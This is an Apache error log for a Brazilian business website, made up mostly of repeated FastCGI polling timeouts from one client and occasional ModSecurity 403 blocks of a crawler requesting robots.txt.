[Sun Mar 15 20:19:51.121790 2026] [proxy_fcgi:error] [pid 32654:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60602] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:20:12.133794 2026] [proxy_fcgi:error] [pid 32654:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:60812] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:20:33.125980 2026] [proxy_fcgi:error] [pid 32654:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:32772] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:21:10.136925 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33174] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:21:31.128380 2026] [proxy_fcgi:error] [pid 32654:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:33280] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:21:55.046053 2026] [proxy_fcgi:error] [pid 32654:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33422] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:22:16.125965 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33556] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:22:43.125821 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33734] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:22:55.280884 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.244.31:49332] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc_T7ABkC4fWIHEf8Gj6gAAAEw"]
[Sun Mar 15 20:23:13.129809 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33952] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:23:27.251523 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.228.16:35394] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc_b3jZBu2q05ozVU8NAwAAAUQ"]
[Sun Mar 15 20:23:41.069843 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34162] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:24:13.065895 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:34390] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:24:41.037802 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34730] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:25:03.121884 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34956] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:25:24.129801 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35112] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:25:45.121412 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35328] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:26:06.125797 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35578] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:26:27.125782 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35814] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:26:48.116593 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35976] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:27:09.121639 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36186] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:27:30.105786 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:36374] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:27:51.125810 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36594] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:28:12.069815 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36780] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:28:12.723925 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.244.31:53214] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdAjLABkC4fWIHEf8GkXgAAAE0"]
[Sun Mar 15 20:28:33.109837 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36948] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:28:55.125787 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37152] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:28:55.294407 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.228.16:48868] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdAt3jZBu2q05ozVU8NcwAAAVU"]
[Sun Mar 15 20:29:16.137810 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:37318] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:29:39.153802 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:37608] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:30:01.176499 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37858] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:30:26.133765 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:38068] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:30:47.129954 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38216] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:31:08.129790 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:38436] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:31:29.128874 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38666] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:31:50.125954 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38948] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:32:12.132454 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39090] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:32:34.129808 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:39314] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:32:55.133809 2026] [proxy_fcgi:error] [pid 32654:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39656] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:33:17.129891 2026] [proxy_fcgi:error] [pid 32654:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:39830] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:33:20.216563 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.244.31:36776] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdBwAlT9VtDQc7bgUxPjQAAAQo"]
[Sun Mar 15 20:33:38.134199 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39958] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:34:00.124958 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40542] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:34:21.057384 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41172] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:34:42.125800 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41350] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:35:03.089828 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41522] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:35:24.113813 2026] [proxy_fcgi:error] [pid 32654:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41768] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:35:48.127331 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42048] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:36:10.126377 2026] [proxy_fcgi:error] [pid 32654:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42226] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:36:32.120892 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42426] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:36:54.101046 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42606] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:37:16.041800 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42830] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:37:37.964898 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43062] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:37:59.130054 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43268] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:38:20.124244 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43494] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:38:41.133791 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43682] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:39:03.121789 2026] [proxy_fcgi:error] [pid 32654:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43888] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:39:25.133858 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44180] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:39:46.125786 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44436] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:40:07.057844 2026] [proxy_fcgi:error] [pid 32654:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44744] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:40:29.120965 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:45058] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:40:51.119133 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45256] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:41:12.129843 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:45554] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:41:33.125785 2026] [proxy_fcgi:error] [pid 32654:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45752] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:41:55.128121 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:46012] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:42:16.121780 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:46148] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:42:38.125782 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46360] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:43:00.128505 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46686] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:43:21.128071 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:46922] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:43:42.134161 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47088] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:43:43.715124 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.244.31:44090] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdEL3jZBu2q05ozVU8OqwAAAVg"]
[Sun Mar 15 20:44:04.037838 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47234] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:44:26.118911 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47448] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:44:48.133795 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47672] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:45:09.127488 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:47998] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:45:31.126956 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48222] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:45:35.034438 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.228.16:45568] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdEn7ABkC4fWIHEf8Gl3AAAAFM"]
[Sun Mar 15 20:45:52.122380 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48406] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:46:13.132147 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48562] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:46:34.129778 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48718] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:46:56.033863 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48970] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:47:17.124522 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49270] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:47:39.057865 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:49572] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:48:00.125826 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49852] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:48:21.127233 2026] [proxy_fcgi:error] [pid 32654:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50022] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:48:43.033949 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50294] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:49:04.131279 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50542] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:49:08.642629 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.244.31:39818] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdFdHjZBu2q05ozVU8PKgAAAVU"]
[Sun Mar 15 20:49:27.126329 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50800] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:49:48.125308 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51094] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:50:10.125808 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51372] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:50:31.125769 2026] [proxy_fcgi:error] [pid 32654:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51572] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:50:49.492725 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.228.16:56664] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdF2Zqj1wV0Si-OkeehRAAAAAI"]
[Sun Mar 15 20:50:53.133810 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:51784] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:51:15.075288 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52076] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:51:36.123158 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52342] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:51:58.125835 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:52648] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:52:20.117854 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52922] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:52:41.129784 2026] [proxy_fcgi:error] [pid 32654:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53104] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:53:02.129810 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53306] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:53:23.129806 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53526] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:53:45.125819 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53740] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:54:06.129249 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53948] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:54:19.226753 2026] [:error] [pid 21946:tid 140411599251200] [client 74.7.244.31:34098] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdGq3bQATo66fKoS7wFQQAAANE"]
[Sun Mar 15 20:54:27.125802 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:54222] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:54:49.125848 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54506] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:55:10.129808 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54762] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:55:32.133784 2026] [proxy_fcgi:error] [pid 32654:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54944] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:55:54.121819 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:55308] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:56:13.662588 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.228.16:33884] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdHHXjZBu2q05ozVU8P0gAAAUY"]
[Sun Mar 15 20:56:16.125785 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55532] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:56:37.069796 2026] [proxy_fcgi:error] [pid 32654:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55680] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:56:58.069530 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55890] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:57:20.129208 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56096] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:57:42.122140 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56258] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:58:03.134388 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56510] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:58:24.119490 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56826] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:58:45.033802 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57102] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:59:07.121798 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:59:29.129836 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57460] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:59:50.561935 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.244.31:39802] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdH9tSswJuvopo3lOghzAAAAIs"]
[Sun Mar 15 20:59:51.121786 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57724] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:00:15.122339 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57906] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:00:36.137787 2026] [proxy_fcgi:error] [pid 32654:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58126] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:00:57.133784 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58354] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:01:18.058005 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58668] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:01:20.229506 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.228.16:48040] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdIUNSswJuvopo3lOgiBgAAAIE"]
[Sun Mar 15 21:01:39.133733 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58920] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:02:01.121759 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:59150] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:02:23.037867 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59378] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:02:44.129794 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59684] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:03:06.089805 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59934] AH01075: Error dispatching request to : (polling)
